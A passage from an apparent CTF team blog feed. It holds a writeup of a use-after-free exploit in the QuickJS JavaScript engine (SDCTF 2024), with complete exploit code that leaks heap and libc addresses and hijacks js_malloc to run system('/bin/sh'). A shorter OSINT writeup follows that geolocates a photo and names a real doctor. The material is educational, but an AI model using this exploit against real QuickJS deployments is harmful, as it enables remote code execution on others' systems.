<span class="c1">// write "/bin/sh\0" at ctx-&gt;rt-&gt;malloc_state's location, which gets passed to js_malloc as the first argument</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6e69622f</span><span class="p">;</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0068732f</span><span class="p">;</span>

<span class="c1">// trigger js_malloc, which will now do system("/bin/sh")</span>
<span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">};</span>
</code></pre></div></div>

<p>Something that I’ve just found out at the time of writing this writeup and commenting my exploit is that even writing too many comments in the exploit code can mess up the heap layout and make the exploit not work. This is probably expected because the JS source code seemed to get allocated on the heap as well, so changing the source code size too much might have effects on the heap layout and break the exploit. Basically, it’s very fragile but at least it’s deterministic :)</p>

<h2 id="full-exploit">Full exploit</h2>

<p>And the full final exploit code:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mh">0x140</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">str</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ</span><span class="dl">"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">uaf_arr</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">objs</span><span class="p">;</span>

<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn1</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn1</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">arr</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn2</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn2</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>

<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="nx">objs</span> <span class="o">=</span> <span class="p">[];</span>
		<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
		<span class="p">}</span>

		<span class="nx">uaf_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x001b0d00</span><span class="p">;</span>
		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0x10</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>

		<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
			<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
				<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
					<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
				<span class="p">}</span>

				<span class="kd">var</span> <span class="nx">uaf_str_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x497f93b1</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x4b</span><span class="p">;</span>

				<span class="kd">const</span> <span class="nx">read_dword</span> <span class="o">=</span> <span class="p">(</span><span class="nx">offset</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
					<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
					<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
						<span class="nx">result</span> <span class="o">=</span> <span class="p">(</span><span class="nx">result</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="nx">str</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="nx">offset</span> <span class="o">+</span> <span class="nx">i</span><span class="p">);</span>
					<span class="p">}</span>
					<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
				<span class="p">};</span>

				<span class="kd">let</span> <span class="nx">heap_base_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x54</span><span class="p">);</span>
				<span class="kd">let</span> <span class="nx">heap_base_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x50</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0xd60</span><span class="p">;</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span> <span class="o">+</span> <span class="mh">0x200</span><span class="p">;</span>
				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xe</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span><span class="p">;</span>
				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xf</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

				<span class="kd">let</span> <span class="nx">libc_leak_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
				<span class="kd">let</span> <span class="nx">libc_leak_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x104</span><span class="p">);</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_low</span> <span class="o">-</span> <span class="mh">0x1a9a50</span><span class="p">;</span>
				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa9</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_high</span><span class="p">;</span>

				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6e69622f</span><span class="p">;</span>
				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0068732f</span><span class="p">;</span>

				<span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">};</span>
			<span class="p">});</span>
		<span class="p">});</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>

<p>The flag: <code class="language-plaintext highlighter-rouge">sdctf{i_PrOMlse_7heRe_1S_n0_UniN7end3D_SOlu7i0n_tHl5_tImE}</code></p>]]></content><author><name>sinamhdv</name></author><summary type="html"><![CDATA[Summary: Exploiting UAF due to an incorrect decrement to the reference count of an object in QuickJS Javascript engine to gain arbitrary read/write and leaks and then using that to gain RCE. Intro SlowJS++ was a Javascript engine exploitation challenge in SDCTF 2024, with only 2 solves during the competition. I could not solve it before the end of the CTF, but I kept working on the exploit and I finally solved it about 10 hours after the end. We were given the challenge binary, which was a recent version of QuickJS Javascript engine compiled with debug info, and told that it was being hosted on Ubuntu 23.10 in the remote environment. I downloaded the libc, libm, and ld for Ubuntu 23.10 and patched the binary to use those. The challenge also had a hint that said we should bindiff the async_func_resume function. QuickJS Internals This challenge is about async functions and promises in Javascript. I found this, this, and this very helpful in understanding the javascript concepts. Also, this writeup was particularly helpful in understanding a bit more about QuickJS internals. 1. JSValue QuickJS represents JSValues as two qwords. The first one is the value (in case of int/double/etc.) or the pointer (for heap objects), and the second qword is a tag that shows the type of the first qword. The tags can be found here. The negative tag values are for objects that are managed by the heap and the garbage collector. The zero and positive tags are for objects that are not allocated separately on the heap, and are represented with their direct value (such as int, double, undefined, etc.). You can look at the different structs used by QuickJS both by looking at the source code and by opening the challenge binary in gdb and using ptype /ox &lt;struct name&gt;. 2. JSString The JSString struct represents a string, and it can be inspected with ptype /ox JSString in gdb: type = struct JSString { /* 0x0000 | 0x0004 */ JSRefCountHeader header; /* 0x0004: 0x0 | 0x0004 */ uint32_t len : 31; /* 0x0007: 0x7 | 0x0001 */ uint8_t is_wide_char : 1; /* 0x0008: 0x0 | 0x0004 */ uint32_t hash : 30; /* 0x000b: 0x6 | 0x0001 */ uint8_t atom_type : 2; /* 0x000c | 0x0004 */ uint32_t hash_next; /* 0x0010 | 0x0000 */ union { /* 0x0000 */ uint8_t str8[0]; /* 0x0000 */ uint16_t str16[0]; /* total size (bytes): 0 */ } u; /* total size (bytes): 16 */ } Basically, there’s some metadata, including the length of the string, in the first 16 bytes, and then from offset 16 the array of string bytes will start (str8). So, the content of the string is not stored in a separate buffer and is stored at the end of the JSString object itself. 3. JSObject The JSObject struct represents a generic javascript object in memory. You can see that each object has a gc header, and the first dword of the header is the reference count for the garbage collector. Another important thing about objects is their class_id, which shows the type of that object. Different class id values can be seen here. JSObjects also have two fields called shape and prop. shape points to a JSShape struct that describes the shape of an object and the properties that it has (similar to a map in v8), and the prop field is a pointer to an array of JSProperty structs that each hold the data for one of the properties of our object. Two important objects to learn about are ArrayBuffers and TypedArrays: An ArrayBuffer object is a JSObject that has a pointer to a JSArrayBuffer struct instance in its obj.u.array_buffer field. The JSArrayBuffer struct has a pointer to its backing storage memory (the actual data buffer) called data and a few other fields like the length. A TypedArray is a kind of array that allows the user to use an array buffer’s storage for different types. For example, a Uint32Array as a typed array that has an array buffer inside itself and uses that array buffer as an array of 32-bit integers. The important fields in a JSObject of a typed array are obj.u.array.u1.typed_array, obj.u.array.u.ptr, and obj.u.array.count. The typed_array field has a pointer to a JSTypedArray struct, which itself has a field called obj that points back at the JSObject of our typed array, and has another pointer called buffer that points to a JSObject representing the array buffer behind this typed array. the ptr and count fields in a typed array object represent the pointer to the backing storage of the array buffer behind this typed array (where the actual “data” is stored), and the length of the array. So, if ta_obj is the JSObject of our typed array, ta_obj.u.array.u.ptr and ta_obj.u.array.u1.typed_array-&gt;buffer-&gt;u.array_buffer-&gt;data both point to the backing storage memory of the array, but the first one is way more convenient so the ptr and count fields inside the typed array object itself are the ones that are used when accessing different indexes of the array. You can look at the source code of JS_SetPropertyValue() to see how this is done. Another important thing to note about array buffers and typed arrays is that the JSArrayBuffer and JSTypedArray structs have next and prev fields inside their struct list_head fields that form a double-linked list. This double linked list will connect an array buffer with all typed arrays that use that array buffer as their storage buffer. The js_array_buffer_finalizer function here has a for-each loop that when an array buffer gets freed, goes through all typed arrays that use this array buffer and sets the count field of those typed arrays to zero. So, the approach in the writeup I mentioned earlier for a TCTF 2021 challenge does not work any more, because if you cause a UAF for an array buffer, you can no longer use typed arrays previously connected to it to read/write memory from its freed backing storage, as the count field of those typed arrays gets set to zero. Debugging A debugging approach that was mentioned in the TCTF writeup by r3kapig was to use Math.min(obj) and break on the js_math_min_max function in gdb, and then inspect the pointer at *$r8 or argv-&gt;u.ptr after hitting the breakpoint to find the address of obj. I also used this approach for debugging and it was really helpful. Vulnerability I downloaded the source for the latest version of QuickJS from https://github.com/bellard/quickjs/tree/d378a9f3a583cb787c390456e27276d0ee377d23 (this is the latest commit at the time of the CTF) and built an original QuickJS binary with debug info to achieve something similar to the challenge binary. Opening both binaries in Ghidra and comparing the async_func_resume function, you can see that the challenge binary will decrease the reference count on the object returned by an async function, and if that reference count reaches zero it will free the object with __JS_FreeValueRT (given that the object has a negative tag value, which means that it is managed by the gc). This is probably the inlined version of the JS_FreeValueRT function here, which does the same thing. So, an object that is returned from an async function gets its refcount decreased by 1 when it shouldn’t have been decreased. So, if we can cause the refcount of an object to become zero and get the object freed while we still keep the reference to that object in our source, we can cause a UAF situation. lVar3 = *(long *)(param_2 + 0xa0); uVar4 = *(undefined8 *)(lVar3 + -8); piVar5 = *(int **)(lVar3 + -0x10); *(undefined (*) [16])(lVar3 + -0x10) = (undefined [16])0x0; *(undefined8 *)(lVar3 + -8) = 3; // if the object has a negative tag (heap object) and (--refcount &lt;= 0): if ((0xfffffff4 &lt; (uint)uVar4) &amp;&amp; (iVar1 = *piVar5, *piVar5 = iVar1 + -1, iVar1 + -1 &lt; 1)) { __JS_FreeValueRT(*(undefined8 *)(param_1 + 0x18),piVar5); // free the object } Using the Math.min(obj) debug approach to inspect the reference count of some objects after they’re created, you can see that their reference count is 1 more than the expected value. For example, an object with only 1 reference to it has a refcount of 2. This is also something mentioned in the TCTF challenge writeup, and I don’t understand the reason for this either. I also think this might be because of some additional internal reference to the object in the engine. Getting arbitrary read/write I wrote an async function that returned the object arr, where arr is a globally-defined Uint32Array. I normally expected that after calling fn1() once and returning from it, arr is freed and the UAF is triggered. However, for some reason it appears that we need to call it twice to have arr get freed. I don’t clearly understand the reason for this and found this with a bit of trial and error and playing around with the initial PoC code. Also, it appeared that if the first Math.min(arr) call (between the fn1() calls; the one marked with // ???) is not there, arr will not get freed somehow. However, when the exploit is completed, commenting that Math.min call did not break the exploit. I assume this might have something to do with the garbage collector being invoked at different times in these situations, but I don’t understand this clearly either. The good thing is that although the garbage collector and the general heap layout of the application is not very predictable and causes weird issues like this, it is deterministic so it won’t change between different runs of the same js code, and we can tweak some stuff to make the issues caused by them go away. var arr = new Uint32Array(0x140); ... async function fn1() { console.log("fn1"); return arr; } ... fn1().then(() =&gt; { Math.min(arr) // ??? fn1().then(() =&gt; { Math.min(1); // arr gets freed here, but we still have the reference to it. }); }); Now if we break after the second fn1() call, we can see that arr is freed and is in the malloc free lists. by inspecting the free lists (tcahce/fastbins) we can see that we need to allocate a few more objects to bring arr’s freed memory to the top of the free lists. We use a for loop to perform some allocations for this. All JSObject structs are allocated using 0x50-sized chunks, so allocating new objects on the heap will use the same free list as arr’s JSObject chunk: objs = []; for (let i = 0; i &lt; 6; i++) { objs.push({a: 1}); } The for loop is allocating 6 new objects and pushing them into some array to keep their references and prevent them from being freed. However, the number of iterations of the loop (6) is not always the same and changes weirdly because of the side effects of other parts of the code on the heap layout and gc operations. I had to change this value from 6 to 7 and vice versa serveral times during the exploit development process. You just have to look at the heap tcahce/fastbins layout at the breakpoint before this code segment to determine the number of iterations of this loop. Now we want to allocate another Uint32Array, but this time we want its ptr field (which points to the actual data storage memory for the array) to point to the same chunk of memory that used to hold the JSObject struct for arr. Therefore, since JSObject structs are allocated in 0x50-sized chunks, it is necessary that the data size of our new array causes the allocation of an 0x50-sized chunk. So, we want our array’s data memory to have a size of 0x48, which means 18 4-byte integers. So, we will define uaf_arr as: uaf_arr = new Uint32Array(18); The allocation of this new typed array causes 3 malloc calls that should return an 0x50-sized chunk. The first one is to host the JSObject of the ArrayBuffer behind this typed array. The second one is to host the backing storage memory of the array (the one that we want to collide with arr’s object struct), and the third one is for the JSObject of the typed array itself. So, we want arr’s freed memory to be the second chunk from the beginning of tcache before we instantiate uaf_arr to ensure that uaf_arr’s data pointer points to it. We need to adjust the number of allocated objects in the previous for loop to meet this requirement. We can do a Math.min(uaf_arr) right after this line to break and see if everything went as we wanted. uaf_arr’s data pointer (ptr field) must point to the same memory that hosted arr’s JSObject struct. Now, we can write into uaf_arr and edit the object metadata of arr as we wish: // set fake object metadata for 'arr' uaf_arr[0] = 10; // large refcount to prevent it from being freed by the gc later uaf_arr[1] = 0x001b0d00; // class_id of Uint32Array and some flags similar to what uaf_arr has uaf_arr[0x10] = 0x10000000; // a huge length value (the .u.array.count field of JSObject) Now we can point arr’s data pointer (.u.array.u.ptr field) to any arbitrary location by editing its value through uaf_arr and then read/write that location by accessing arr[0]. However, we don’t have any kind of leak yet so we don’t know what address to write there. The memory of uaf_arr is also zeroed out when its re-allocated, so we can’t find any pointers there. Getting leaks In order to get leaks I did the same thing that we did to arr, but this time to a string. If we can cause a JSString to be freed and then allocate a Uint32Array whose data pointer points to the JSString struct memory, we can manipulate the length of the JSString and set it to some huge value, and then we can have oob read on the heap through that string. var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"; // a JSString that occupies an 0x50-sized chunk ... async function fn2() { console.log("fn2"); return str; } ... fn1().then({ fn1().then({ ... // do stuff related to causing UAF for 'arr' ... fn2().then({ fn2().then({ // 'str' gets freed here while we still have a reference to it. // allocate more objects to bring str's freed memory near the top of tcachebin for (let i = 0; i &lt; 6; i++) { objs.push({a: 1}); } // allocate a typed array with its data pointer pointing to str's freed memory (freed JSString struct) var uaf_str_arr = new Uint32Array(18); // set metadata of the JSString struct uaf_str_arr[0] = 2; // large refcount to avoid it getting freed by gc uaf_str_arr[1] = 0x10000000; // huge length uaf_str_arr[2] = 0x497f93b1; // some metadata I copied from original 'str' uaf_str_arr[3] = 0x4b; // some metadata I copied from original 'str' ... }); }); }); }); This has the exact same process as exploiting arr. You just have to adjust the size of the initial content of str so that its JSString struct is allocated in an 0x50-sized chunk, so allocating {a: 1} objects will allocate from the same malloc freelist as it. Now that we can read stuff from the heap, I wrote a helper function to read a dword from the heap: const read_dword = (offset) =&gt; { let result = 0; for (let i = 3; i &gt;= 0; i--) { result = (result &lt;&lt; 8) | str.charCodeAt(offset + i); } return result; }; Then, I set a breakpoint and used tel gdb command to inspect the pointers that come after str’s buffer on the heap. I could find a pointer with a constant offset from libc base and another pointer with a constant offset from heap base. I used these to leak libc and heap base. Getting RCE The JSContext *ctx that gets passed as the first argument to many js functions has a field named rt which is a pointer to JSRuntime. JSRuntime also has a field JSMallocFunctions mf, and another one JSMallocState malloc_state. mf has 4 function pointers, the first of which is js_malloc. Its signature shows that the first argument to it is a JSMallocState *. So, if we can overwrite the ctx-&gt;rt-&gt;mf.js_malloc function pointer with system() and we can write "/bin/sh" at &amp;(ctx-&gt;rt-&gt;malloc_state), we will be able to call system("/bin/sh") by triggering js_malloc. Just before doing that, I set the shape field of arr’s object metadata to point to the middle of some area near the base of the heap that seemed to contain just zero. This will prevent segfaults in an inline function find_own_property called by JS_SetPropertyInternal, which is the function used for writing to an index of arr. In the end, allocating any object will trigger js_malloc and give us a shell. This is the final part of the exploit: // leak the heap base low and high dwords by reading them from the heap let heap_base_high = read_dword(0x54); let heap_base_low = read_dword(0x50) - 0xd60; console.log(heap_base_high.toString(16)); console.log(heap_base_low.toString(16)); // set the 'shape' property of 'arr' to the middle of an area with zeros. // this will prevent segfaults in find_own_property which is an inlined function called // by JS_SetPropertyInternal when performing writes to an index of arr uaf_arr[6] = heap_base_low + 0x200; uaf_arr[7] = heap_base_high; // set the data pointer of arr to point to the heap base uaf_arr[0xe] = heap_base_low; uaf_arr[0xf] = heap_base_high; // leak (main_arena+96), which is a libc address, by reading it off the heap let libc_leak_low = read_dword(0x100); let libc_leak_high = read_dword(0x104); console.log(libc_leak_high.toString(16)); console.log(libc_leak_low.toString(16)); // Math.min(uaf_arr); // set ctx-&gt;rt-&gt;mf-&gt;js_malloc to system() arr[0xa8] = libc_leak_low - 0x1a9a50; // libc-dependant offset arr[0xa9] = libc_leak_high; // write "/bin/sh\0" at ctx-&gt;rt-&gt;malloc_state's location, which gets passed to js_malloc as the first argument arr[0xb0] = 0x6e69622f; arr[0xb1] = 0x0068732f; // trigger js_malloc, which will now do system("/bin/sh") var x = {a: 1}; Something that I’ve just found out at the time of writing this writeup and commenting my exploit is that even writing too many comments in the exploit code can mess up the heap layout and make the exploit not work. This is probably expected because the JS source code seemed to get allocated on the heap as well, so changing the source code size too much might have effects on the heap layout and break the exploit. Basically, it’s very fragile but at least it’s deterministic :) Full exploit And the full final exploit code: var arr = new Uint32Array(0x140); var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"; var uaf_arr; var objs; async function fn1() { console.log("fn1"); return arr; } async function fn2() { console.log("fn2"); return str; } fn1().then(() =&gt; { fn1().then(() =&gt; { objs = []; for (let i = 0; i &lt; 6; i++) { objs.push({a: 1}); } uaf_arr = new Uint32Array(18); uaf_arr[0] = 10; uaf_arr[1] = 0x001b0d00; uaf_arr[0x10] = 0x10000000; fn2().then(() =&gt; { fn2().then(() =&gt; { for (let i = 0; i &lt; 6; i++) { objs.push({a: 1}); } var uaf_str_arr = new Uint32Array(18); uaf_str_arr[0] = 2; uaf_str_arr[1] = 0x10000000; uaf_str_arr[2] = 0x497f93b1; uaf_str_arr[3] = 0x4b; const read_dword = (offset) =&gt; { let result = 0; for (let i = 3; i &gt;= 0; i--) { result = (result &lt;&lt; 8) | str.charCodeAt(offset + i); } return result; }; let heap_base_high = read_dword(0x54); let heap_base_low = read_dword(0x50) - 0xd60; console.log(heap_base_high.toString(16)); console.log(heap_base_low.toString(16)); uaf_arr[6] = heap_base_low + 0x200; uaf_arr[7] = heap_base_high; uaf_arr[0xe] = heap_base_low; uaf_arr[0xf] = heap_base_high; let libc_leak_low = read_dword(0x100); let libc_leak_high = read_dword(0x104); console.log(libc_leak_high.toString(16)); console.log(libc_leak_low.toString(16)); arr[0xa8] = libc_leak_low - 0x1a9a50; arr[0xa9] = libc_leak_high; arr[0xb0] = 0x6e69622f; arr[0xb1] = 0x0068732f; var x = {a: 1}; }); }); }); }); The flag: sdctf{i_PrOMlse_7heRe_1S_n0_UniN7end3D_SOlu7i0n_tHl5_tImE}]]></summary></entry><entry><title type="html">[UMDCTF 2024] Lost on Caladan</title><link href="https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan/" rel="alternate" type="text/html" title="[UMDCTF 2024] Lost on Caladan" /><published>2024-05-01T00:00:00+00:00</published><updated>2024-05-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan</id><content type="html" xml:base="https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan/"><![CDATA[<h1 id="lost-on-caladan-500-osint">Lost on Caladan [500] OSINT</h1>

<h2 id="challenge-description">Challenge Description</h2>

<p>you seek to find the finest doctor on caladan. it’s rumored he works at this location. find his name for me.</p>

<h2 id="solution">Solution</h2>

<p>As a Dune enthuaist, who has seen both films half a dozen times, I know that the finest doctor on Caladan is Dr. Yueh. However, the ctf server did not accept the flag <code class="language-plaintext highlighter-rouge">UMDCTF{Wellington_Yueh}</code>. Nonetheless, we were provided with a .jpg file of a certain google street view (360 degress full panoramic view)</p>

<p><img src="/assets/images/umdctf2024/lost-on-caladan.jpg" alt="image" /></p>

<p>From here, we are given an image of a Google StreetView of a supposedly medical center.</p>

<p>Lets try to find cues to identify macro details of the location i.e. country, administrative division such as provinces, states, cities, etc.</p>

<p>With the glarring white on red stop octogon being the ‘Stop Sign’ , we can tell that is based in North America, specifcally in an English speaking territory. Québec, being the uniquely French speaking province in Canada, have French signages of ‘arrêt’. We can rule out the possibility of it being in Québec.</p>

<p>Additoinally, we can see the detailed high-visibility direction signs near the entrance/exit of the parking lot. In North America, as medical centers often span multiple buildings, clear and concise directions are necessary. They are also presented in high contrast colors (blue and white or red and white) for high visibility. Additionally, there are arrows to point the way at intersections.</p>

<p><img src="/assets/images/umdctf2024//image-copy-3.png" alt="image" /></p>

<p>or</p>

<p><img src="/assets/images/umdctf2024//image-copy-4.png" alt="image" /></p>

<p>We can conclude that this is located at a fairly largel medical center in the region. Possibly with more than 300+ beds and attached with out-patient, emergency, rehabilitation, and surgical facilities.</p>

<p>Now lets look for some other identifiers.</p>

<p>The newstand by the entrance of the building may provide some insight. Only the <strong>“amp”</strong> is visble in this newspaper or megazine dispenser.</p>

<p><img src="/assets/images/umdctf2024//image-copy.png" alt="image" /></p>

<p><img src="/assets/images/umdctf2024//image2.png" alt="image" /></p>

<p>We can initially conclude that <strong>“amp”</strong> matches the megazine “Arkansas Money &amp; Politics” which is a local Arkansas publication. This should help us narrow down the search to Arkansas, USA. However, given the scope of the state</p>

<ol>
  <li>Baptist Health Medical Center - Little Rock (834 Beds)</li>
  <li>CHI St. Vincent Infirmary (615 Beds)</li>
  <li>UAMS Medical Center (535 Beds)</li>
</ol>

<p><a href="https://www.hospitalmanagement.net/features/largest-hospitals-arkansas-2021/?cf-view">Source</a> .</p>

<p>The satellite view of Baptist Health Medical Center - Little Rock shows a similar parking lot layout and the same high-visibility direction signs.</p>

<p><img src="/assets/images/umdctf2024//image-copy-5.png" alt="image" /></p>

<p>The parking lot layout and the high-visibility direction signs (white on dark blue) are similar to the ones in image.</p>

<p><img src="/assets/images/umdctf2024//image6.png" alt="image" /></p>

<p>Zooming in on Google Street View, we can select an intersection that fit in our criteria of being near a large parking lot and a medical tower.</p>

<p><img src="/assets/images/umdctf2024//image7.png" alt="image" /></p>

<p>The beige building on the right is rather interesting, as it is accros from a parking lot and matches the color of the building in the image.</p>

<p><img src="/assets/images/umdctf2024//image8.png" alt="image" /></p>

<p>Aha we’ve reached our destination, where a minibus is parked at the front and where the latest issues of Arkansas Money &amp; Politics are available.</p>

<p>“Baptist Eye Center”, is a surgical opthamology center affiliated with Baptist Health Medical Center - Little Rock. Doctors at this center should be the people we are looking for.</p>

<p>Heading over on <a href="https://doctor.webmd.com/practice/baptist-health-eye-and-surgery-center-9d3dc05a-da81-4601-a0eb-e564ea77205d/physicians/">WebMD</a> we can see a list of ophanmologists working at the center.</p>

<p><img src="/assets/images/umdctf2024//image-copy-9.png" alt="image" /></p>

<p>We took the name ‘best’ doctor literally, as we initially tried to submit the flags containing the names of the highest rated doctors, such as as <code class="language-plaintext highlighter-rouge">UMDCTF{Christian_Cardell_Hester}</code>. It was not until after nearly 15 minutes of bruting through all of the doctors names that we realized the zero star rated “Dr. Sean Adonis Atreides.”</p>

<p><code class="language-plaintext highlighter-rouge">UMDCTF{Sean_Adonis_Atreides}</code> unfortunately was not his full name. We scrambled to find the full name of the doctor, and going on Oklahoman Board of Medical Licensure and Supervision, we found that his full name is “Sean Paul Adonis Atreides”.</p>

<p><img src="/assets/images/umdctf2024//image10.png" alt="image" /></p>

<h2 id="flag">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">UMDCTF{Sean_Paul_Adonis_Atreides}</code></p>]]></content><author><name>frankuu</name></author><summary type="html"><![CDATA[Lost on Caladan [500] OSINT]]></summary></entry></feed>